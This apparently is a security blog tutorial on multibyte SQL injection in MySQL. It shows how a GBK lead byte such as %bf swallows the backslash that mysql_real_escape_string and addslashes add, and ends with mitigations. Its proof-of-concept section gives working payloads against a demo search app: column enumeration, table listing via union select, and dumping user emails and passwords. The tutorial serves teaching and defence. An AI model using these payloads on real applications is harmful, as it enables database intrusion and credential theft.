MultiByte SQL Injection – Bypasses MySql Real Escape String And AddSlashes Protection

My SQL Real Escape String & AddSlashes:

In simple words its a mysql library function which will escape the special characters in a string. A sample syntax is as follows

mysqli_real_escape_string($connstring, $id);

The function adds an escape character, the backslash, \, before certain potentially dangerous characters in a string passed in to the function. The characters escaped are \x00, \n, \r, \, ‘, ” and \x1a.

 When a malicious user send a payload like

select * from users where id=" (payload here) "; - > (payload= " or "1"="1-- )

This will be filtered by mysql_real_escape_string() function as follows

select * from users where id=" (payload here) "; - > (payload filtered like= \" or \"1\"=\"1-- )

In the same way addslashes() function also works.

MySQL Charsets:

MySQL supports several character sets by default. You can locate them easily in your mysql console as follows.

mysql> SHOW CHARACTER SET;
+--------------------+---------------------------------+
| CHARACTER_SET_NAME | DESCRIPTION                     |
+--------------------+---------------------------------+
| big5               | Big5 Traditional Chinese        |
| cp932              | SJIS for Windows Japanese       |
| eucjpms            | UJIS for Windows Japanese       |
| euckr              | EUC-KR Korean                   |
| gb18030            | China National Standard GB18030 |
| gb2312             | GB2312 Simplified Chinese       |
| gbk                | GBK Simplified Chinese          |
| sjis               | Shift-JIS Japanese              |
| ujis               | EUC-JP Japanese                 |
+--------------------+---------------------------------+

MultiByte Injection:

As we already familiar with mysql_real_escape_string() which will a add slash(%5c) before our quote(%27). Here the thing is when i use %bf or %af infront of our quote(%27) then it is converted as follows.

%bf' - > %bf%5c' ---------here %bf%5c becomes the chinese ¿ character which already present in gbk character set

%af' -> %af%5c'  ---------here %af%5c becomes the chinese ┐ character which already present in gbk character set

In this way we can break our sql query and again sql injection will happen.

Proof Of Concept:

To make it very clear i made a sample demo application which facilitates us a Simple Search functionality.

Here i am using %bf’ to break the query.

I need column details in order to make union queries so i did a quick search like

%bf' order by 10--

Yup we got the columns next i need table names. Our search query will be

%bf' union all select 1,group_concat(table_name,0x0a),3,4,5,6,7,8,9,10 from mysql.innodb_table_stats where database_name=schema();-- 

Finally Dumping the Credentials.

%bf' union all select 1,group_concat(email,0x0a,password),3,4,5,6,7,8,9,10 from users-- 

Mitigations:

  • Trust No One – Remeber this and sanitize everything that comes from front end users.
  • Prepared Statements, Stored Procedures and Parameterized queries will defend properly against these attacks.

References:

  • https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
  • http://php.net/manual/en/security.database.sql-injection.php

One Comment

Leave A Comment

Your email address will not be published. Required fields are marked *